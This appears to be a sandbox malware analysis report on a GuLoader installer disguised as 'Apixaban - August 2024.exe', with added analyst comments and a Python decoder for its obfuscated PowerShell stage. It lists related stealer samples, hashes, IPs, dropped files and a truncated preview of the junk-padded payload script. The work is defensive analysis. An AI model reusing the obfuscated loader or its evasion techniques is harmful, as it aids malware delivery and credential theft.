54328bd36c14bd82ddaa0c04b25ed9ad | Torpernes.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Confirmation Order.js | malicious | Snake Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Lisect_AVT_24003_G1B_21.exe | malicious | Unknown | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Lisect_AVT_24003_G1B_21.exe | malicious | Unknown | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Lisect_AVT_24003_G1B_127.exe | malicious | PureLog Stealer | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exe | malicious | Lokibot | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Deye Union - PO # 23081377.exe | malicious | Snake Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | rPO0977-6745.exe | malicious | Snake Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e | Torpernes.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | LisectAVT_2403002C_15.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | LisectAVT_2403002C_16.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | jRlq1fSUW5.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Q2XwE8NRLx.exe | malicious | Quasar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Lisect_AVT_24003_G1A_33.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Lisect_AVT_24003_G1B_84.msi | malicious | AteraAgent | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Lisect_AVT_24003_G1B_33.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Lisect_AVT_24003_G1B_122.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | DD Spotify Acc Gen.exe | malicious | Blank Grabber, Umbral Stealer | 149.154.167.220
37f463bf4616ecd445d4a1937da06e19 | ESPLS-RFQ_2400282.exe | malicious | Azorult, GuLoader | 108.167.181.251
37f463bf4616ecd445d4a1937da06e19 | Confirmation transfer AGS # 22-00379.exe | malicious | FormBook, GuLoader | 108.167.181.251
37f463bf4616ecd445d4a1937da06e19 | ESPLS-RFQ_2400282.exe | malicious | Azorult, GuLoader | 108.167.181.251
37f463bf4616ecd445d4a1937da06e19 | MB9901717-PDF.exe | malicious | Azorult, GuLoader | 108.167.181.251
37f463bf4616ecd445d4a1937da06e19 | MGL6070111-PDF.exe | malicious | Azorult, GuLoader | 108.167.181.251
37f463bf4616ecd445d4a1937da06e19 | Torpernes.exe | malicious | GuLoader, Snake Keylogger | 108.167.181.251
37f463bf4616ecd445d4a1937da06e19 | LisectAVT_2403002C_159.exe | malicious | Bdaejec, DarkSide | 108.167.181.251
37f463bf4616ecd445d4a1937da06e19 | nX1oQE2we8.exe | malicious | CryptOne, Qbot | 108.167.181.251
37f463bf4616ecd445d4a1937da06e19 | LisectAVT_2403002C_160.exe | malicious | Upatre | 108.167.181.251
37f463bf4616ecd445d4a1937da06e19 | Bootstrapper.exe | malicious | Hancitor, Vidar | 108.167.181.251

No context
Modified file: PowerShell's module analysis cache (PSMODULECACHE header listing PowerShellGet cmdlets), ordinary PowerShell housekeeping.
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):8003
Entropy (8bit):4.840877972214509
Encrypted:false
SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:106D01F562D751E62B702803895E93E0
SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:false
Reputation:moderate, very likely benign file
                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Dropped file: PowerShell's own AppLocker policy probe, written on every PowerShell start; expected in any powershell.exe run and not an action of the malware.
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode

Dropped file: a second copy of the same AppLocker probe (identical hashes), again written by powershell.exe and benign.
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode

Dropped file: the PowerShell stage written by the NSIS installer as a single 70 KB line. Variable names come from a Danish-looking word list, the <# ... #> comment blocks are padding, and the $Chamaenerion string carries the real script interleaved with junk characters; see the preview.
Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
File Type:ASCII text, with very long lines (65536), with no line terminators
Category:dropped
Size (bytes):70493
Entropy (8bit):5.227839377157676
Encrypted:false
SSDEEP:1536:KLFSLu8BHGODl6RJBKsSjMXY+BlPjVG9hvps9o8AYm7H:M4uA1SKDFAl5mvpsoDf7H
MD5:E8C10FA43292064CE249E7DA783AB7A5
SHA1:F6718CA6240DEB84559ED748FAC1A7056AF8E28C
SHA-256:491246350A01C2115E9166F01DF3168283131D07CF28BE0936A8F25608DBAB04
SHA-512:2A642C462090EE046440D01A9EE48267D1D51CCA86A7BE407CE8E83153F24785302B3697E62674D7565DC82A9A639830D20AE8CA9EB2527972D62ED16FBD5C62
Malicious:true
Reputation:low
                                              Preview:$Graduationen=$Sikkerhedsforvarede;<#Dramatiserende Sabromin Blokfunktioner Rekognosceringsflyet Trosflle Oplagrer #><#Insufflating Outkill Honnrmarchernes Satiriseringer Optryktes #><#Cinematograph singler philadelphite #><#Bloktilbagekoblingens osteomancy Chiantis Mlkesyre Kartonernes Tegntypes Smaadreng #><#Hjemgaaendes afrivningers Unspasmodical Skrpende Unsceptically Permanence #><#Handelsforbindelses Edikt Besvret Sndagen Echimys Drifternes Interchondral #>$Chamaenerion = "Pastelf;Overins`$Dhole,iEGldb ndnForhngsgForstudhGrsen.eoBalastds Brndemt RecepteArbejdsd C esce= C nogo`$BanepakSAnhyd,ipSolacemes.kstancEnriquei Bourgoa,nprecilOperatib T,waiteNonemulh.cappleaOltun,anS,ndsopdReo.irulAurel.ueAnt.olisTwinkl,;D mmerfFMen,hevuSenderenTiltmakcSteatoptHaringbiRoadeosoDistriknKongepi Bed.evSSlb.vodh Nikolerfordsuti Barf.dn jateorkEnergireSepulchr Samlet Anis.d(Pinnato`$BovbladFSpoofsjoEgenskarCalquinmTastineaInterreaIngen rl,eglozeeHemic.atLrkered,Omstndi Nonpre`$FluorotDEggcra i
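Added example, not code from the Joe Sandbox report or from the sample: a stride decoder for the $Chamaenerion string in the preview above. Taking every Nth character of a long junk-filled string is one common way the GuLoader PowerShell stage hides its real script, and the decode below confirms that scheme for this sample. The stride and offset are not stated anywhere on this page, so the code searches for them by scoring every candidate for PowerShell syntax (keyword list and weights are my choices). The input is the string exactly as the preview shows it, PowerShell escapes included; because the preview drops non-ASCII bytes, the alignment only survives for the first few dozen characters, which is enough to see the real code begin with ;$Enghosted=$Specialbehandles;Function.

```python
import re

# The $Chamaenerion string as printed in the report's preview of the dropped
# script. It is PowerShell double-quoted syntax, so `$ is an escaped dollar.
CHAMAENERION_RAW = (
    "Pastelf;Overins`$Dhole,iEGldb ndnForhngsgForstudhGrsen.eoBalastds Brndemt RecepteArbejdsd C esce= C nogo`$"
    "BanepakSAnhyd,ipSolacemes.kstancEnriquei Bourgoa,nprecilOperatib T,waiteNonemulh.cappleaOltun,anS,ndsopdReo.irulAurel.ueAnt.olisTwinkl,;"
    "D mmerfFMen,hevuSenderenTiltmakcSteatoptHaringbiRoadeosoDistriknKongepi Bed.evSSlb.vodh Nikolerfordsuti Barf.dn jateorkEnergireSepulchr Samlet Anis.d(Pinnato`$"
    "BovbladFSpoofsjoEgenskarCalquinmTastineaInterreaIngen rl,eglozeeHemic.atLrkered,Omstndi Nonpre`$FluorotDEggcra i"
)

# Tokens that only appear once the junk is stripped away. This list is an
# assumption for scoring, not something taken from the sample.
KEYWORDS = ("Function", "Invoke", "Substring", "Start-Sleep", "GetProcAddress", "VirtualAlloc")


def unescape_ps_dq(raw: str) -> str:
    """Resolve the escapes that occur in this kind of string: `$ `" and `` each
    yield the literal character. Other `x escapes (`n, `t) are not needed here."""
    return re.sub("`([$`\"])", r"\1", raw)


def every_nth(text: str, offset: int, stride: int) -> str:
    """Characters at offset, offset+stride, ...: what a PowerShell loop with a
    stepped index, or a stepped range expression, extracts from the string."""
    return text[offset::stride]


def score_powershell(text: str) -> int:
    """Higher is more PowerShell-like: keywords weigh most, then the ';$' and
    '=$' digraphs of chained assignments, then plain $variable references."""
    score = 10 * sum(text.count(k) for k in KEYWORDS)
    score += 2 * len(re.findall(r"[;=]\$", text))
    score += len(re.findall(r"\$[A-Za-z]{3,}", text))
    return score


def best_stride(text: str, max_stride: int = 16):
    """Try every (offset, stride) pair and return the best-scoring decode as
    (offset, stride, decoded_text, score). Ties keep the smallest stride."""
    best = (-1, 0, 0, "")
    for stride in range(2, max_stride + 1):
        for offset in range(stride):
            candidate = every_nth(text, offset, stride)
            score = score_powershell(candidate)
            if score > best[0]:
                best = (score, offset, stride, candidate)
    score, offset, stride, decoded = best
    return offset, stride, decoded, score


if __name__ == "__main__":
    clean = unescape_ps_dq(CHAMAENERION_RAW)
    offset, stride, decoded, score = best_stride(clean)
    print(f"offset={offset} stride={stride} score={score}")
    print(decoded)
```

On the real 70 KB file the same search applies to the full string value rather than the preview, and the decoded text is itself PowerShell that should be read, not executed.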

Dropped file: 317,845 bytes of type "data" at entropy 7.67, written by the sample itself and with no recognisable header; consistent with an encrypted or compressed payload. Malicious:false here only means that no static signature matched, not that the file is benign.
Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
File Type:data
Category:dropped
Size (bytes):317845
Entropy (8bit):7.665223330622794
Encrypted:false
SSDEEP:6144:8t2hJjHx7SaCi5QzNDA2STBIXH5BpEuB1k88nXEzlHERarE4/spAS2fM:8MhJjHcacXUIpEbXiWRarE4/5S2fM
MD5:04F84B9B85A6D31E825551492196AC2C
SHA1:117B72EFE18901048085CC747AC362E478B30E0B
SHA-256:2CE93893BBA7090AF4F45D93DACC9665FA79E291DD225DAA1E61FE3A4AA8F075
SHA-512:530E0E77DBA1BA95368970B2C06C0AB8A900D1547704BD742FD03BFE292E43D9182D8D6586194BDA53D0209C61E4C08C21F786E15F66D553BDF9A51D10E36CE5
Malicious:false
Reputation:low
                                              Preview:..........................Q.......W..........^^^.2....m..............r.ff..+..E..............(..*.........W...............22222..................ZZ..u........3.z..............D...........................................i.........[..MM...........]..yy..F.ooo............hh....W...MMM.............#.......................................>......................................G...............ttt.........V.VVV........................mmm..............ZZZZZ......pp............dd.........................===.....bb.............................................................................???............7.........................k....U......................@@.d..^^^^........@.......&...............*.....BB....................4444.`.......^^......m............QQ......................66666......+................9..................`.......gg..........9...............................??......................................p........................................00.)...***......jj..........."".....

Dropped file: a byte-identical copy of the submitted installer (MD5, SHA1 and SHA-256 equal the sample hashes in the report header), written by powershell.exe rather than by the installer itself. A script host writing a PE to disk is the kind of event endpoint telemetry should flag regardless of the file's hash.
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):852456
Entropy (8bit):7.604597113334501
Encrypted:false
SSDEEP:12288:Rt7ExDo//OtX1lxawkeVCGmQzVuoLZJtyG5Hm0WbHYYgh3sZR/pKJt80sNja656y:jYDoeMwkejuoLDt9ZPU/aFsN2vL+
MD5:0E198C53CE387336130BE0C8AD27B7AF
SHA1:AE1762434FBAFE22F064EBA92398F4C118969EFD
SHA-256:53CF1C4A06B8846E9ABF3D97F46FA3CD6C50BDF1FE7C46AA64B65960EB456484
SHA-512:B3D1125852398CE5C3DE8E243EA46805C05F4D0F8CCADA52284C7F5A9A9778A6573A50167E58EB5B5E2EE3AE4C9CB7C165F2050D907B3B3BCE66CF6A6EEF02E0
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 53%
Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@..........................................................................t...........Y...........................................................................p...............................text...f^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...................................rsrc....Y.......Z...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

Dropped file: Mark-of-the-Web metadata, [ZoneTransfer] with ZoneId=0, which is the content of a Zone.Identifier alternate data stream written by powershell.exe. ZoneId=0 is the Local Machine zone, so this stream applies no Mark-of-the-Web restrictions to the file it belongs to.
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              File Type:ASCII text, with very long lines (367), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):440
                                              Entropy (8bit):4.2802377004664205
                                              Encrypted:false
                                              SSDEEP:12:QEUc9mHApTzMcC94e7q6hDwyK2Xkj9rKZaq:l9JTMp7AyKykBrk
                                              MD5:9524154CFD936F21394F74D000856732
                                              SHA1:3A45FE1B1EAAE9A1CAF11CA59FEBA1B3DE8E0CA3
                                              SHA-256:8EE6AE6BD6F5AF379B359A0CDD7721AEAEE0989C4B61431F2EAB1240FBBA56A2
                                              SHA-512:4DA2F73D1D6F027B9C939785F63D6F75477F978AB7F8532D8395D5C5C346397E1E4B090CC815AA5F75E2629F81C1FD64B7246266331DBB26D3B0075CE4579250
                                              Malicious:false
                                              Preview:habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious deklinationen armiferous bryggerkar totaktsmotorernes ombudsmandsudtalelsers overtinsel metronidazole uldspind..unmortifiedness ildspaasttelserne plagiostomata klauss ryaerne carline,
                                              Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):629448
                                              Entropy (8bit):1.257234589035216
                                              Encrypted:false
                                              SSDEEP:1536:LD3CLXCvTm3+3JOgkFWZfcDkZLwWIE4pzswWg95LDsRgtlVkIRh:X3US6uZOgk2fcJl5FWy5LDEQlK0
                                              MD5:B9E5947712FA407B58A8527B52CE050E
                                              SHA1:9FD16F2F3569FF478C591E16A03EF65F7D63E57E
                                              SHA-256:30B60EB19A5E7A32DAB61A17C1BCA485D8040EE9488024AA031C0190A7DCB510
                                              SHA-512:BBCF1AC518547982928276E01EA61C26600A426EBD57928A82801F5ACBD8E2047359AC1CB41DEB0898CFB5D10BAA419C782C910830517C3F44F555963D6EEB9D
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):221081
                                              Entropy (8bit):1.2406328235167285
                                              Encrypted:false
                                              SSDEEP:768:+sNmrp+QYzgwtqzOh8mcMPPy14oMvFzm8w/Y8vnLXWY8UBiBXVO3FzxrFUHItn4x:Y9A/S50ytu8voKwH
                                              MD5:D0A61E12A7A27A4B719AB0C4B9F57B88
                                              SHA1:55A349C760BA7AF05C54934924E2C0289BB3FF24
                                              SHA-256:243221C7BE40D55E82FDF162332959F85DF94CAF3EC8BC550EEE0DE0FC814A64
                                              SHA-512:3F117A4C26DDC7200AF9A79E8965F4396D175B368FF372BC7210929B15BA43B56EF68C6870F914638EC49ADF18CB553DF4492F583485ECC954C0238CC1405670
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1248907
                                              Entropy (8bit):3.7915159042372246
                                              Encrypted:false
                                              SSDEEP:12288:aMhJjHcacXUIpEbXiWRarE4/5S2f44h3tDQ5Cact5v:ZhRHRCUIpEbXi3ZAK3tM4v
                                              MD5:ABEBD1F184166922C6AB5A41AD6F1DCA
                                              SHA1:BD7FB36D783C4D301AB097D4B6EE574BA7CF1264
                                              SHA-256:6F22D53F2F6F237B6AD102ADC3D857548C1C2F14E60878AFE0825C65CB0DEAA5
                                              SHA-512:42C4EBACF429F074279F9F78B4E939E36ED16C7BBF64A1F4CD5712116DCF829B1AED6EC46893A85F758E66C0F44D9C37D2531E897326B49A352DFD40FBB09C4E
                                              Malicious:false
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.604597113334501
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Apixaban - August 2024.exe
                                              File size:852'456 bytes
                                              MD5:0e198c53ce387336130be0c8ad27b7af
                                              SHA1:ae1762434fbafe22f064eba92398f4c118969efd
                                              SHA256:53cf1c4a06b8846e9abf3d97f46fa3cd6c50bdf1fe7c46aa64b65960eb456484
                                              SHA512:b3d1125852398ce5c3de8e243ea46805c05f4d0f8ccada52284c7f5a9a9778a6573a50167e58eb5b5e2ee3ae4c9cb7c165f2050d907b3b3bce66cf6a6eef02e0
                                              SSDEEP:12288:Rt7ExDo//OtX1lxawkeVCGmQzVuoLZJtyG5Hm0WbHYYgh3sZR/pKJt80sNja656y:jYDoeMwkejuoLDt9ZPU/aFsN2vL+
                                              TLSH:8B05125573A2E980DC450D74415BCB818EB2CD242A52EA8737A8B7AFDF336C17B06357
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@
                                              Icon Hash:293cc0c898b02800
                                              Entrypoint:0x403358
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                              Signature Valid:false
Signature Issuer:CN="Stereographical Aplacophoran ", O=Skilderhusene, L=Villemomble, S=Île-de-France, C=FR
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 10/07/2024 10:49:44 10/07/2027 10:49:44
                                              Subject Chain
• CN="Stereographical Aplacophoran ", O=Skilderhusene, L=Villemomble, S=Île-de-France, C=FR
                                              Version:3
                                              Thumbprint MD5:09E48A2D24D434C9B03763AC3842AFFC
                                              Thumbprint SHA-1:06E381E065DC1EC0458B3C8F9505E61DC6935161
                                              Thumbprint SHA-256:0A0729A9A709CCBF7AE5518697B00097BD70E82361F4E78166082D9FE9908715
                                              Serial:5C0C40BDC78747BF5F1DC7917DCFEEF1C9C94E14
                                              Instruction
                                              sub esp, 000002D4h
                                              push ebx
                                              push ebp
                                              push esi
                                              push edi
                                              push 00000020h
                                              xor ebp, ebp
                                              pop esi
                                              mov dword ptr [esp+14h], ebp
                                              mov dword ptr [esp+10h], 00409230h
                                              mov dword ptr [esp+1Ch], ebp
                                              call dword ptr [00407034h]
                                              push 00008001h
                                              call dword ptr [004070BCh]
                                              push ebp
                                              call dword ptr [004072ACh]
                                              push 00000008h
                                              mov dword ptr [00429298h], eax
                                              call 00007F78A4B0D22Ch
                                              mov dword ptr [004291E4h], eax
                                              push ebp
                                              lea eax, dword ptr [esp+34h]
                                              push 000002B4h
                                              push eax
                                              push ebp
                                              push 00420690h
                                              call dword ptr [0040717Ch]
                                              push 0040937Ch
                                              push 004281E0h
                                              call 00007F78A4B0CE97h
                                              call dword ptr [00407134h]
                                              mov ebx, 00434000h
                                              push eax
                                              push ebx
                                              call 00007F78A4B0CE85h
                                              push ebp
                                              call dword ptr [0040710Ch]
                                              cmp word ptr [00434000h], 0022h
                                              mov dword ptr [004291E0h], eax
                                              mov eax, ebx
                                              jne 00007F78A4B0A37Ah
                                              push 00000022h
                                              mov eax, 00434002h
                                              pop esi
                                              push esi
                                              push eax
                                              call 00007F78A4B0C8D6h
                                              push eax
                                              call dword ptr [00407240h]
                                              mov dword ptr [esp+18h], eax
                                              jmp 00007F78A4B0A43Eh
                                              push 00000020h
                                              pop edx
                                              cmp cx, dx
                                              jne 00007F78A4B0A379h
                                              inc eax
                                              inc eax
                                              cmp word ptr [eax], dx
                                              je 00007F78A4B0A36Bh
                                              add word ptr [eax], 0000h
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x48000 | 0x55918 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xcea10 | 0x17d8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5e66 | 0x6000 | e8f12472e91b02deb619070e6ee7f1f4 | False | 0.6566569010416666 | data | 6.419409887460116 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x202d8 | 0x600 | a5ec1b720d350c6303a7aba8d85072bf | False | 0.4733072916666667 | data | 3.7600484096214832 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x1e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x48000 | 0x55918 | 0x55a00 | 3d6a8b72f49b497aa2f6e828f36e2071 | False | 0.6818487682481752 | data | 6.750089044557724 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x486e8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.48516798769667574
RT_ICON | 0x58f10 | 0x104d3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004043671653862
RT_ICON | 0x693e8 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.5461162497372294
RT_ICON | 0x72890 | 0x6b94 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.995279593318809
RT_ICON | 0x79428 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.5835951940850277
RT_ICON | 0x7e8b0 | 0x4c28 | Device independent bitmap graphic, 128 x 256 x 8, image size 16384 | English | United States | 0.46250512925728354
RT_ICON | 0x834d8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.5978979688238073
RT_ICON | 0x87700 | 0x2d6f | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9944114865445791
RT_ICON | 0x8a470 | 0x2ca8 | Device independent bitmap graphic, 96 x 192 x 8, image size 9216 | English | United States | 0.5530090972708187
RT_ICON | 0x8d118 | 0x2868 | Device independent bitmap graphic, 128 x 256 x 4, image size 8192 | English | United States | 0.31254833720030933
RT_ICON | 0x8f980 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.6519709543568465
RT_ICON | 0x91f28 | 0x1bc8 | Device independent bitmap graphic, 72 x 144 x 8, image size 5184 | English | United States | 0.6259842519685039
RT_ICON | 0x93af0 | 0x16e8 | Device independent bitmap graphic, 96 x 192 x 4, image size 4608 | English | United States | 0.3922237380627558
RT_ICON | 0x951d8 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096 | English | United States | 0.68688293370945
RT_ICON | 0x96800 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.7211538461538461
RT_ICON | 0x978a8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States | 0.7316098081023454
